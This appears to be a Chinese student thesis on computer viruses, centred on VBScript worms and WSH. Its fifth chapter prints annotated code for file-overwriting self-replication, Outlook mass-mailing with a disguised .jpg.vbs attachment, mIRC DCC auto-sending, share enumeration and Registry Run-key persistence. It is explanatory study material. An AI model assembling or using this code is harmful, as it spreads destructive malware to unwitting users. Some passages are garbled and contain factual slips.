第一章 概述
在信息社会的时代里,信息主权是一个国家继政治主权和经济主权之后的新主权。在人类社会的三个要素中,物质在工业社会其关键作用,能量在工业社会社会中起核心作用,信息则在当今社会中叱咤风云。信息工业在一个国家的国民经济中所占的比例反映了这个国家的经济水平和工业发展水平。对信息安全的认识和掌控程度不及影响到一个国家的根本利益,影响企业和个人的利益,同时也反映了一个国家的现代化程度。而病毒则是信息安全的一个重要的分支,也是当今信息安全领域里人们耗费精力和财力最多领域,据测算人类每年要在病毒防治中耗费数千亿美元的资金,而这场战斗至今仍在继续!
VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。由于VBS病毒实现简单,入门容易使得这种病毒成为Initernent世界里最为流行的病毒之一。
第二章 什么是病毒及病毒的分类
2.1、病毒的定义
计算机病毒是一个程序,一段可执行码。就想生物一样,计算机病毒有独特的复制能力。计算机病毒可以很快的蔓延传染,有长长的难以根除。它们把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时,他就随着文件一起蔓延开来。
我们一般可以从下面几个方面给出计算机的定义。一种是通过磁盘、磁带和网络等作为媒介传播扩散,能"传染"其他程序的程序。另一种定义能够实现自身复制且借助一定的载体存在的、具有潜伏性、传染性和破坏性的程序等等。还有一种定义是一种人为制造的程序,它通过不同的途径潜伏或寄生在存储媒体(如磁盘、内存)或程序里,当某种条件或时机成熟时,它会自生复制并传播,使计算机的资源受到不同程度的破坏等等。这些说法在某种意义上借用生物学病毒的概念,计算机病毒同生物病毒所相似之处是能够入侵计算机系统和网络,危害正常工作的"病原体"。它能够对计算机体统进行各种破坏,同时能够自我复制,具有传染性。
所以,我们得出计算机病毒的定义是:能够通过某种途径潜伏在计算机存储介质(或程序)里,当达到某种条件时即被激活具有对计算机资源进行破坏的一组程序或指令的集合。
2.2、 病毒的分类
2.2.1、 按病毒感染的对象
2.2.1.1、 引导型病毒
这类病毒攻击的对象就是磁盘的引导扇区,这样就能使系统在启动时获得优先的执行权,从而达到控制整个系统的目的,这类病毒因为感染的是引导扇区,所以造成的损失也就比较大,一般来说会造成系统无法正常启动,但查杀这类病毒也较容易,多数杀毒软件都能查杀这类病毒,如KV300、KILL系列等。
2.2.1.2、 文件型病毒
早期的这类病毒一般是感染以exe、com等为扩展名的可执行文件,这样的话当你执行某个可执行文件时病毒程序就跟着激活。近期也有一些病毒感染以dll、ovl、sys等为扩展名的文件,因为这些文件通常是某程序的配置、链接文件,所以执行某程序时病毒也就自动被子加载了。它们加载的方法是通过插入病毒代码整段落或分散插入到这些文件的空白字节中,如CIH病毒就是把自己拆分成9段嵌入到PE结构的可执行文件中,感染后通常文件的字节数并不见增加,这就是它的隐蔽性的一面。
2.2.1.3、 网络型病毒
这种病毒是近几来网络的高速发展的产物,感染的对象不再局限于单一的模式和单一的可执行文件,而是更加综合、更加隐蔽。现在一些网络型病毒几乎可以对所有的OFFICE文件进行感染,如WORD、EXCEL、电子邮件等。其攻击方式也有转变,从原始的删除、修改文件到现在进行文件加密、窃取用户有用信息(如黑客程序)等,传播的途经也发生了质的飞跃,不再局限磁盘,而是通过更加隐蔽的网络进行,如电子邮件、电子广告等。
2.2.1.4、 复合型病毒
把它归为"复合型病毒",是因为它们同时具备了"引导型"和"文件型"病毒的某些特点,它们即可以感染磁盘的引导扇区文件,也可以感染某此可执行文件,如果没有对这类病毒进行全面的清除,则残留病毒可自我恢复,还会造成引导扇区文件和可执行文件的感染,所以这类病毒查杀难度极大,所用的杀毒软件要同时具备查杀两类病毒的功能。
2.2.2、 按病毒的破坏程度
2.2.2.1、良性病毒
这些病毒之所以把它们称之为良性病毒,是因为它们入侵的目的不是破坏你的系统,只是想玩一玩而已,多数是一些初级病毒发烧友想测试一下自己的开发病毒程序的水平。它们并不想破坏你的系统,只是发出某种声音,或出现一些提示,除了占用一定的硬盘空间和CPU处理时间外别无其它坏处。如一些木马病毒程序也是这样,只是想窃取你电脑中的一些通讯信息,如密码、IP地址等,以备有需要时用。
2.2.2.2、恶性病毒
我们把只对软件系统造成干扰、窃取信息、修改系统信息,不会造成硬件损坏、数据丢失等严重后果的病毒归之为"恶性病毒",这类病毒入侵后系统除了不能正常使用之外,别无其它损失,系统损坏后一般只需要重装系统的某个部分文件后即可恢复,当然还是要杀掉这些病毒之后重装系统。
2.2.2.3、极恶性病毒
这类病毒比上述b类病毒损坏的程度又要大些,一般如果是感染上这类病毒你的系统就要彻底崩溃,根本无法正常启动,你保分留在硬盘中的有用数据也可能随之不能获取,轻一点的还只是删除系统文件和应用程序等。
2.2.2.4、灾难性病毒
这类病毒从它的名字我们就可以知道它会给我们带来的破坏程度,这类病毒一般是破坏磁盘的引导扇区文件、修改文件分配表和硬盘分区表,造成系统根本无法启动,有时甚至会格式化或锁死你的硬盘,使你无法使用硬盘。如果一旦染上这类病毒,你的系统就很难恢复了,保留在硬盘中的数据也就很难获取了,所造成的损失是非常巨大的,所以我们进化论什么时候应作好最坏的打算,特别是针对企业用户,应充分作好灾难性备份,还好现在大多数大型企业都已认识到备份的意义所在,花巨资在每天的系统和数据备份上,虽然大家都知道或许几年也不可能遇到过这样灾难性的后果,但是还是放松这"万一"。雀巢就是这样,而且还非常重视这个问题。如98年4.26发作的CIH病毒就可划归此类,因为它不仅对软件造成破坏,更直接对硬盘、主板的BIOS等硬件造成破坏。
2.2.3 、按入侵的方式
2.2.3.1、源代码嵌入攻击型
从它的名字我们就知道这类病毒入侵的主要是高级语言的源程序,病毒是在源程序编译之前插入病毒代码,最后随源程序一起被编译成可执行文件,这样刚生成的文件就是带毒文件。当然这类文件是极少数,因为这些病毒开发者不可能轻易得到那些软件开发公司编译前的源程序,况且这种入侵的方式难度较大,需要非常专业的编程水平。
2.2.3.2、代码取代攻击型
这类病毒主要是用它自身的病毒代码取代某个入侵程序的整个或部分模块,这类病毒也少见,它主要是攻击特定的程序,针对性较强,但是不易被发现,清除起来也较困难。
2.2.3.3、系统修改型
这类病毒主要是用自身程序覆盖或修改系统中的某些文件来达到调用或替代操作系统中的部分功能,由于是直接感染系统,危害较大,也是最为多见的一种病毒类型,多为文件型病毒。
2.2.3.4、外壳附加型
这类病毒通常是将其病毒附加在正常程序的头部或尾部,相当于给程序添加了一个外壳,在被感染的程序执行时,病毒代码先被执行,然后才将正常程序调入内存。目前大多数文件型的病毒属于这一类。
第三章 病毒的起源和发展
3.1、病毒的起源和发展
谈到病毒的起源和发展不得不提到大名鼎鼎的贝尔实验室,20世纪60年代初,美国贝尔实验室里,三个年轻的程序员编写了一个名为"磁芯大战"的游戏,游戏中通过复制自身来摆脱对方的控制,这就是所谓"病毒"的第一个雏形。
20世纪70年代,美国作家雷恩在其出版的<< P1的青春>>一书中构思了一种能够自我复制的计算机程序,并第一次称之为"计算机病毒"。
1983年11月,在国际计算机安全学术研讨会上,美国计算机专家首次将病毒程序在VAX/750计算机上进行了实验,世界上第一个计算机病毒就这样出生在实验室中。
20世纪80年代后期,巴基斯坦有两个编软件为生的兄弟,他们为了打击那些盗版软件的使用者,设计出了一个名为"巴基斯坦智囊"的病毒,该病毒只传染软盘引导。这就是最早在世界上流行的一个真正的病毒。
1988年至1989年,我国也相继出现了也能感染硬盘和软盘引导区的Stoned(石头)病毒,该病毒体代码中有明显的标志"Your PC is now Stoned!"、"LEGALISE MARIJUANA!",也称为"大麻"病毒"等。该病毒感染软硬盘0面0道1扇区,并修改部分中断向量表。该病毒不隐藏也不加密自身代码,所以很容易被查出和解除。类似这种特性的还有"小球、Azusa/Hong-Kong/2708、 Michaelangelo,这些都是从国外传染进来的。而国产的有Bloody、 Torch、Disk Killer等病毒,实际上它们大多数是Stoned病毒的翻版。
20世纪90年代初,感染文件的病毒有Jerusalem(黑色13号星期五)、 YankeeDoole、 Liberty、 1575、 Traveller、1465、2062,4096等,主要感染.COM和.EXE文件。这类病毒修改了部分中断向量表,被感染的文件明显的增加了字节数,并且病毒代码主体没有加密,也容易被查出和解除。 这些病毒中, 略有对抗反病毒手段的只有Yankee Doole病毒, 当它发现你用DEBUG工具跟踪它的话,它会自动从文件中逃走。
接着, 又一些能对自身进行简单加密的病毒相继出现,有1366(DaLian)、1824(N64)、1741(Dong)、1100等病毒。它们加密的目的主要是防止跟踪或掩盖有关特征等。
在内存有1741病毒时, 用DIR列目录表,病毒会掩盖被感染文件所增加的字节数,使看起来字节数很正常。
而1345-64185病毒却每传染一个目标就增加一个字节, 增到64185个字节时,文件就被破坏。
以后又出现了引导区、文件型"双料"病毒,这类病毒既感染磁盘引导区、又感染可执行文件,常见的有Flip/Omicron、 XqR(New century)、Invader/侵入者、 Plastique/塑料炸弹、3584/郑州(狼)、3072(秋天的水)、ALFA/3072-2、Ghost/One_Half/3544(幽灵)、Natas(幽灵王)、TPVO/3783等,如果只解除了文件上的病毒,而没解除硬盘主引导区的病毒,系统引导时又将病毒调入内存,会重新感染文件。如果只解除了主引导区的病毒,而可执行文件上的病毒没解除,一执行带毒的文件时,就又将硬盘主引导区感染。
Flip/Omicron(颠倒)、XqR(New century新世纪)这两种病毒都设计有对抗反病毒技术的手段,Flip(颠倒)病毒对其自身代码进行了随机加密,变化无穷,使绝大部分病毒代码与前一被感染目标中的病毒代码几乎没有三个连续的字节是相同的,该病毒在主引导区只潜藏了少量的代码,病毒另将自身全部代码潜藏于硬盘最后6个扇区中,并将硬盘分区表和DOS引导区中的磁盘实用扇区数减少了6个扇区,所以再次起动系统后, 硬盘的实用空间就减少了6个扇区。这样,原主引导记录和病毒主程序就保存在硬盘实用扇区外,避免了其它程序的覆盖,而且用DEBUG的L命令也不能调出查看,就是用FORMAT进行格式化也不能消除病毒,可见,病毒编制者用意深切!与此相似的还有Denzuko病毒。
XqR(New century新世纪)病毒也有它更狡猾的一面,它监视着INT13、INT21中断有关参数,当你要查看或搜索被其感染了的主引导记录时,病毒就调换出正常的主引导记录给你查看或让你搜索,使你认为一切正常,病毒却蒙混过关。病毒的这种对抗方法,我们在此称为:病毒在内存时,具有"反串"(反转)功能。这类病毒还有Mask(假面具)、2709/ROSE(玫瑰)、One_Half/3544(幽灵)、Natas/4744、Monkey、PC_LOCK、DIE_HARD/HD2、GranmaGrave/Burglar/1150、 3783病毒等,现在的新病毒越来越多的使用这种功能来对抗按装在硬盘上的抗病毒软件,但用无病毒系统软盘引导机器后,病毒就失去了"反串"(反转)功能。
1345、 1820、PCTCOPY-2000病毒却直接隐藏在COMMAND.COM文件内的空闲(0代码)部位,从外表上看,文件一个字节也没增加。
INT60(0002)病毒隐藏的更加神秘,它不修改主引导记录, 只将硬盘分区表修改了两个字节,使那些只检查主引导记录的程序认为完全正常,病毒主体却隐藏在这两个字节指向的区域。硬盘引导时,ROM-BIOS程序糊理糊涂的按这两个字节的引向,将病毒激活。病毒太狡猾了,只需两个字节,就可以牵着机器的鼻子走!
Monkey(猴子)、PC_LOCK(加密锁)病毒将硬盘分区表加密后再隐藏起来, 如果轻易将硬盘主引导记录更换,或用FDISK/MBR格式轻易将硬盘主引导记录更换, 那么,就再进不了硬盘了,数据也取不出来了,所以,不要轻易使用FDISK/MBR格式。
1992年以来,DIR2-3、DIR2-6、NEW DIR2病毒以一种全新的面貌出现,具有感染力极强,无任何表现,不修改中断向量表,而直接修改系统关键中断的内核,修改可执行文件的首簇数, 将文件名字与文件代码主体分离。 在系统有此病毒的情况下,一切就象没发生一样。而在系统无病毒时,你用无病毒的文件去覆盖有病毒的文件,灾难就会发生,全盘所有被感染的可执行文件内容都是刚覆盖进去的文件内容。这是病毒"我死你也活不成"的罪恶伎俩。该病毒的出现,使病毒又多了一种新类型。
20世纪内,决大多数病毒是基于DOS系统的,有80%的病毒能在WINDOWS中传染。TPVO/3783病毒是"双料性"、(传染引导区、文件)"双重性"(DOS、WINDOWS)病毒,这是病毒随着操作系统发展而发展。当然,Internet的广泛应用,Java恶意代码病毒也出现了。
脚本病毒"HAPPYTIME快乐时光"是一种传染能力非常强的病毒。该病毒利用体内VBScript代码在本地的可执行性(通过Windows Script Host进行),对当前计算机进行感染和破坏。即,一旦我们将鼠标箭头移到带有"HAPPYTIME快乐时光"病毒体的邮件名上时,不必打开信件,就能受到HAPPYTIME"快乐时光"病毒的感染,该病毒传染能力很强。
近几年,出现了近万种WORD(MACRO宏)病毒,并以迅猛的势头发展,已形成了病毒的另一大派系。由于宏病毒编写容易,不分操作系统,再加上Internet网上用WORD格式文件进行大量的交流,宏病毒会潜伏在这些WORD文件里,被人们在Internet网上传来传去。
早在1995年时,出现了一个更危险的信号,在我们对众多的病毒剥析中,发现部分病毒好象出于一个家族,其"遗传基因"相同,简单的说,是"同族"病毒。但绝不是其他好奇者简单的修改部分代码而产生的"改形"病毒。
"改形"病毒的定义此应简单的说,与"原种"病毒的代码长度相差不大,绝大多数病毒代码与"原种"的代码相同, 并且相同的代码其位置也相同, 否则就是一种新的病毒。
大量具有相同"遗传基因"的"同族"病毒的涌现,使人不的不怀疑"病毒生产机"软件已出现。1996年下半年在国内终于发现了"G2、IVP、VCL"三种"病毒生产机软件",不法之徒,可以用来编出千万种新病毒。目前国际上已有上百种"病毒生产机"软件。
这种"病毒生产机"软件可不用绞尽脑汁的去编程序,便会轻易的自动生产出大量的"同族"新病毒。这些病毒代码长度各不相同,自我加密、解密的密钥也不相同,原文件头重要参数的保存地址不同,病毒的发作条件和现象不同,但是,这些病毒的主体构造和原理基本相同。
"病毒生产机"软件,其"规格"有专门能生产变形病毒的、有专门能生产普通病毒的。目前,国内发现的、或有部分变形能力的病毒生产机有"G2、 IVP、VCL病毒生产机等十几种。具备变形能力的有CLME、DAME-SP/MTE病毒生产机等。它们生产的病毒都有"遗传基因"于相同的特点,没有广谱性能的查毒软件,只能是知道一种,查一种,难于应付"病毒生产机"生产出的大量新病毒。
据港报载, 香港已有人也模仿欧美的Mutation Eneine(变形金刚病毒生产机)软件编写出了一种称为CLME(Crazy Lord Mutation Eneine)即"疯狂贵族变形金刚病毒生产机", 已放出了几种变形病毒, 其中一种名为CLME.1528。 国内也发现了一种名为CLME.1996、DAME-SP/MTE的病毒。 更令人可恶的是,编程者公然在BBS站和国际互联网Internet中纵恿他人下传。"病毒生产机"的存在,随时就有可能存在着"病毒暴增"的危机!
危机一个接一个,网络蠕虫病毒I-WORM.AnnaKournikova,就是一种VBS/I-WORM病毒生产机生产的,它一出来,短时间内就传便了全世界。这种病毒生产机也传到了我国。Windows9x、win2000操作系统的发展,也使病毒种类和样随其变化而变化。以下例举几个点型的WINDOWS病毒。
WIN32.CAW.1XXX病毒是驻留内存的Win32病毒,它感染本地和网络中的PE格式文件。该病毒的产生是来源一种32位的Windows"CAW病毒生产机", 该"CAW病毒生产机"是国际上一家有名的病毒编写组织开发的。
"CAW病毒生产机"能生产出来各种各样的CAW病毒,有加密的和不加密的,其字节数一般在1000至2000内。目前在国内流行的有:CAW.1531、CAW.1525、CAW.1457、CAW.1419、CAW.1416、CAW.1335、CAW.1226等,在国际上流行的CAW.1XXX病毒种类更多。
3.2、病毒的发展所带来的灾难
1998年8月26日,CIH-1.4病毒首先跳出来发作,我国部分地区遭到袭击,但损害面积不大。事后,为了必免更大灾害,我国政府职能部门公安部发出了通缉三种CIH病毒的通告。可是,使用正版杀毒软件的意识不被一些用户重视,又不经常保持升级杀毒软件,CIH-1.2病毒又经过一年的传播,已传遍全世界,世界性的巨大杀机潜伏下来了,一场人类史无前例的信息大却难即将暴发。
1999年4月26日,一个计算机行业难以忘却的日子,也就是到了CIH-1.2病毒第二年的发作日,人们起早一上班便轻松的打开计算机准备工作,可是,打开一台计算机后,只看到屏幕一闪便就黑暗一片。再打开另外几台,也同样一闪后就再也启动不起来了...,计算机史上,病毒造成的又一次巨大的浩劫发生了。
一大早,反病毒软件公司所有的电话铃声急急不断的振耳,急促促的报警电话蜂拥而来。门外,需求修复数据而手持硬盘和抬着机器的人们象一条长龙一样,从楼上到楼下,一直排到大街上。"谁能给我修好数据,我出高价!"的叫喊声到处可听见。
据报导,此次病毒的浩劫,在东方的亚州国家最严重。欧美国家嘲笑东方国家,一说盗版严重而带来,二说反病毒软件落后。可是,在此前的一个月,欧美的"美丽杀"病毒在西方造成了更为严重的灾难,其经济损失远远超过CIH病毒对亚洲造成的损失,而CIH病毒造成的破坏,绝大部分则可以修好。
"美丽杀"病毒对欧美的破坏,比CIH病毒对亚洲的破坏要大的多。"美丽杀"病毒对亚洲没什么破坏,而"CIH"病毒同样对欧美有较大的破坏。欧美所谓先进的反病毒软件也不堪一击,所谓全球病毒监测网如同虚构。
随着Internet网的发展,使病毒传播更加方便、更加广泛,网络蠕虫病毒已成为病毒主力,这应使我们严加防犯。
在这里我要指出的是现在大多数网络蠕虫是用VBS编制出来的,就是利用病毒制造机生产出来的"机器"病毒现阶段也绝大多数是VBS脚本病毒,这就是我为什么要把VBS病毒作为论文的主要部分来写的原因。
第四章 VBS病毒的起源与发展及其危害
4.1、 VBS的运行基础
说起VBS病毒我们必须提起微软为我们提供的脚本程序:WSH(Windows Scripting Host)这个为大多数人不知道的小程序为我浏览网页带来的更为精彩的视觉享受,为我们的办公程序更好的为我们服务带来了更大的便利,也同时为我的爱机带来了更多的惊慌与恐怖!
什么是WSH(Windows Scripting Host)?
WSH--这个在词典中都很难找寻的名词,对许多朋友来讲也许还比较陌生。但正是WSH ,使 Windows 操作系统具备了更为强大的功能。它让我们在使用系统时拥有了许多的便利,但同时,也让我们的电脑遭遇了不少的麻烦。下面,就让我们一步步走进 WSH 的神秘世界,共同评判它的是非功过。
WSH,是"Windows Scripting Host"的缩略形式,其通用的中文译名为"Windows 脚本宿主"。对于这个较为抽象的名词,我们可以先作这样一个笼统的理解:它是内嵌于 Windows 操作系统中的脚本语言工作环境。
再具体一点描述:你自己编写了一个脚本文件,如后缀为 .vbs 或 .js 的文件,然后在 Windows 下双击并执行它,这时,系统就会自动调用一个适当的程序来对它进行解释并执行,而这个程序,就是 Windows Scripting Host,程序执行文件名为 Wscript.exe (若是在命令行下,则为 Cscript.exe)。
WSH 诞生后,在 Windows 系列产品中很快得到了推广。除 Windows 98 外,微软在 Internet Information Server 4.0、Windows Me、Windows 2000 Server,以及 Windows 2000 Professional 等产品中都嵌入了 WSH。现在,早期的 Windows 95 也可单独安装相应版本的 WSH。
WSH 的设计,在很大程度上考虑到了"非交互性脚本(noninteractive scripting)"的需要。在这一指导思想下产生的 WSH,给脚本带来非常强大的功能,例如:我们可以利用它完成映射网络驱动器、检索及修改环境变量、处理注册表项等工作;管理员还可以使用 WSH 的支持功能来创建简单的登陆脚本,甚至可以编写脚本来管理活动目录。
任何事物都有两面性,WSH 也不例外。应该说,WSH 的优点在于它使我们可以充分利用脚本来实现计算机工作的自动化;但不可否认,也正是它的这一特点,使我们的系统又有了新的安全隐患。许多计算机病毒制造者正在热衷于用脚本语言来编制病毒,并利用 WSH 的支持功能,让这些隐藏着病毒的脚本在网络中广为传播。 I Love You 便是一个典型代表。因此,大家对于来历不明、尤其是邮件附件里的一些脚本文件还是应该保持戒备。
4.2、 VBS病毒的发展和危害
正是有了这种强大Scripting Host 脚本支持加上这种脚本的编制目前大多数是VB Scripting 和jave Scripting脚本语言,这种脚本语言有相当的容易上手,所以它的入门很低,编制相当的容易,这就造成了以这种脚本语言编制的病毒在Windows中相当的流行,也成为人们防杀的主要对象之一!
其实当微软在推出WHS后不久就在Windows 95中发现利用它的病毒,随后又发现了更为厉害的Happly Time(欢乐时光)病毒,这种病毒不断的利用自身的复制功能,把自己复制到你的计算机内的每一个文件夹内,我曾经在我们学校的一个机房内发现了这种病毒把整个硬盘都变成了它的根据地,那种场景真是太恐怖了。
而在2000年5月4日欧美爆发的"宏病毒"网络蠕虫病毒。由于通过电子邮件系统传播,宏病毒在短短几天内狂袭全球数百万计的电脑。微软、Intel等在内的众多大型企业网络系统瘫痪,全球经济损失达几十亿美元。而去年爆发的新欢乐时光病毒至今都让广大电脑用户更是苦不堪言。最近在网络上还出现了VBS病毒制造机,这种病毒制造机让病毒能在一个对病毒什么都不懂得人只需轻轻的点点鼠标,就可以造出威力惊人的计算机病毒,使得VBS病毒成为人们更难以琢磨的随机性的东西,加上人们只需对相应的病毒代码进行再编辑就可以造出更多的VBS病毒的变种,使人们对这种的防治更加困难,这就是为什么我们下载的专杀工具有时候对我们已知的病毒仍然无能为力的原因。
由于VBS病毒的这种特点,使它的破坏性大,感染力强。VBS脚本病毒语言功能强大,直接调用Windows组件,可迅速获得对系统文件及注册表的控制权,这就使得一旦发作,即可造成大的破坏。如耗费系统资源、制造系统垃圾、滥发电子邮件、阻塞网络等。再加之脚本是直接解释执行的,使得它的感染变的非常简单,电子邮件、局域网共享、文件感染、IRC感染等都是它感染的良好途径。另外它的欺骗性强,不易彻底消灭。编写良好的VBS脚本病毒本身就很善于伪装自己,它们想尽千方百计不引起杀毒软件及电脑使用者的注意,再加之一些别有用心的无聊之人的操作,如给邮件附件取双后缀名来欺骗电脑使用者,使得VBS脚本病毒传播变的隐蔽和容易。而且VBS脚本病毒的生命力十分顽强,使得它的彻底清除有了一定的难度。
第五章 VBS病毒的原理及其传染方式
5.1、 vbs脚本病毒如何感染、搜索文件
VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而宏病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过宏病毒的部分代码具体分析一下这类病毒的感染和搜索原理: 以下是文件感染的部分关键代码:
Set fso=createobject("scripting.filesystemobject")
'创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1)
'读打开当前文件(即病毒本身)
vbscopy=self.readall
' 读取病毒全部代码到字符串变量vbscopy……
set ap=fso.opentextfile(目标文件.path,2,true)
' 写打开目标文件,准备写入病毒代码
ap.write vbscopy ' 将病毒代码覆盖目标文件
ap.close
set cop=fso.getfile(目标文件.path) '得到目标文件路径
cop.copy(目标文件.path & ".vbs")
' 创建另外一个病毒文件(以.vbs为后缀)
目标文件.delete(true)
'删除目标文件
上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。
下面我们具体分析一下文件搜索代码:
'该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
sub scan(folder_) 'scan函数定义,
on error resume next '如果出现错误,直接跳过,防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 当前目录的所有文件集合
for each file in filesext=fso.GetExtensionName(file)
'获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext="mp5" then '如果后缀名是mp5,则进行感染。
请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。
Wscript.echo (file)
end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders '搜索其他目录;递归调用
scan( ) scan(subfolder)
next
end sub
上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。
5.2 、vbs脚本病毒通过网络传播的几种方式及代码分析
VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,VBS脚本病毒采用如下几种方式进行传播:
5.2.1、通过Email附件传播
这是一种用的非常普遍的传播方式,病毒可以通过各种方法拿到合法的Email地址,最常见的就是直接取outlook地址簿中的邮件地址,也可以通过程序在用户文档(譬如htm文件)中搜索Email地址。
下面我们具体分析一下VBS脚本病毒是如何做到这一点的:
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = createObject("Outlook.Application")
//创建一个OUTLOOK应用的对象
If outlookApp= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI")
//获取MAPI的名字空间
Set addrList= mapiObj.AddressLists
//获取地址表的个数
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
//获取每个地址表的Email记录数
For addrEntIndex= 1 To addrEntCount
//遍历地址表的Email地址
Set item = outlookApp.createItem(0)
//获取一个邮件对象实例
Set addrEnt = addr.AddressEntries(addrEntIndex)
//获取具体Email地址
item.To = addrEnt.Address
//填入收信人地址
item.Subject = "病毒传播实验"
//写入邮件标题
item.Body = "这里是病毒邮件传播测试,收到此信请不要慌张!
" //写入文件内容
Set attachMents=item.Attachments //定义邮件附件
attachMents.Add fileSysObj.GetSpecialFolder(0)&"\test.jpg.vbs"
item.deleteAfterSubmit = True
//信件提交后自动删除
If item.To <> "" Then
item.Send
//发送邮件
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1"
//病毒标记,以免重复感染
End If
NextEnd IfNext
End if
End Function
5.2.2、 通过局域网共享传播
局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说,为了局域网内交流方便,一定存在不少共享目录,并且具有可写权限,譬如win2000创建共享时,默认就是具有可写权限。这样病毒通过搜索这些共享目录,就可以将病毒代码传播到这些目录之中。
在VBS中,有一个对象可以实现网上邻居共享文件夹的搜索与文件操作。我们利用该对象就可以达到传播的目的。
welcome_msg = "网络连接搜索测试"
Set WSHNetwork = WScript.createObject("WScript.Network")
'创建一个网络对象
Set oPrinters = WshNetwork.EnumPrinterConnections
'创建一个网络打印机连接列表
WScript.Echo "Network printer mappings:"
For i = 0 to oPrinters.Count - 1Step2
'显示网络打印机连接情况
WScript.Echo " ort "&oPrinters.Item(i)
& " = " & oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives
'创建一个网络共享连接列表
If colDrives.Count = 0 Then
MsgBox "没有可列出的驱动器。",
vbInformation + vbOkOnly,welcome_msg
Else
strMsg = "当前网络驱动器连接: " &CRLF
Fori=0To colDrives.Count - 1 Step 2
strMsg = strMsg & Chr(13)&Chr(10)&colDrives(i)
& Chr(9)&colDrives(i+1)
Next
MsgBox strMsg, vbInformation + vbOkOnly,
welcome_msg'显示当前网络驱动器连接
End If
上面是一个用来寻找当前打印机连接和网络共享连接并将它们显示出来的完整脚本程序。在知道了共享连接之后,我们就可以直接向目标驱动器读写文件了。
5.2.3、通过感染htm、asp、jsp、php等网页文件传播
如今,WWW服务已经变得非常普遍,病毒通过感染htm等文件,势必会导致所有访问过该网页的用户机器感染病毒。
病毒之所以能够在htm文件中发挥强大功能,采用了和绝大部分网页恶意代码相同的原理。基本上,它们采用了相同的代码,不过也可以采用其它代码,这段代码是病毒FSO,WSH等对象能够在网页中运行的关键。在注册表HKEY_CLASSES_ROOT\CLSID\下我们可以找到这么一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B},注册表中对它他的说明是"Windows Script Host Shell Object",同样,我们也可以找到{0D43FE01-F093-11CF-8940-00A0C9054228},注册表对它的说明是"FileSystem Object",一般先要对COM进行初始化,在获取相应的组件对象之后,病毒便可正确地使用FSO、WSH两个对象,调用它们的强大功能。代码如下所示:
Set Apple0bject = document.applets("KJ_guest")Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")Apple0bject.createInstance() '创建一个实例
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
Apple0bject.createInstance()
'创建一个实例
Set FSO = Apple0bject.Get0bject()
对于其他类型文件,这里不再一一分析。
5.2.4、通过IRC聊天通道传播
病毒通过IRC传播一般来说采用以下代码(以MIRC为例)
Dim mirc
set fso=createObject("Scripting.FileSystemObject")
set mirc=fso.createTextFile("C:\mirc\script.ini")
'创建文件script.ini
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs",
True '将病毒文件备份到attachment.vbs
mirc.WriteLine "[script]"
mirc.WriteLine "n0=on 1:join:*.*:
{if($nick !=$me){halt} /dcc send $nick C:\mirc\attachment.vbs }"
'利用命令/ddc send $nick attachment.vbs给通道中的其他用户传送病毒文件
mirc.Close
以上代码用来往Script.ini文件中写入一行代码,实际中还会写入很多其他代码。Script.ini中存放着用来控制IRC会话的命令,这个文件里面的命令是可以自动执行的。譬如,TUNE.VBS病毒就会修改c:\mirc\script.ini 和 c:\mirc\mirc.ini,使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。同样,如果Pirch98已安装在目标计算机的c:\pirch98目录下,病毒就会修改c:\pirch98\events.ini和c:\pirch98\pirch98.ini,使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。
另外病毒也可以通过现在广泛流行的KaZaA进行传播。病毒将病毒文件拷贝到KaZaA的默认共享目录中,这样,当其他用户访问这台机器时,就有可能下载该病毒文件并执行。这种传播方法可能会随着KaZaA这种点对点共享工具的流行而发生作用。
还有一些其他的传播方法,我们这里不再一一列举。
5.3、 VBS脚本病毒如何获得控制权
如何获取控制权?这一个是一个比较有趣的话题,而VBS脚本病毒似乎将这个话题发挥的淋漓尽致。笔者在这里列出几种典型的方法:
5.3.1、修改注册表项
windows在启动的时候,会自动加载HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序,这样就可以保证每次机器启动的时候拿到控制权。vbs修改贮册表的方法比较简单,直接调用下面语句即可。 wsh.RegWrite(strName, anyvalue [,strType])
5.3.2、通过映射文件执行方式
譬如,我们新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。
5.3.3、欺骗用户,让用户自己执行
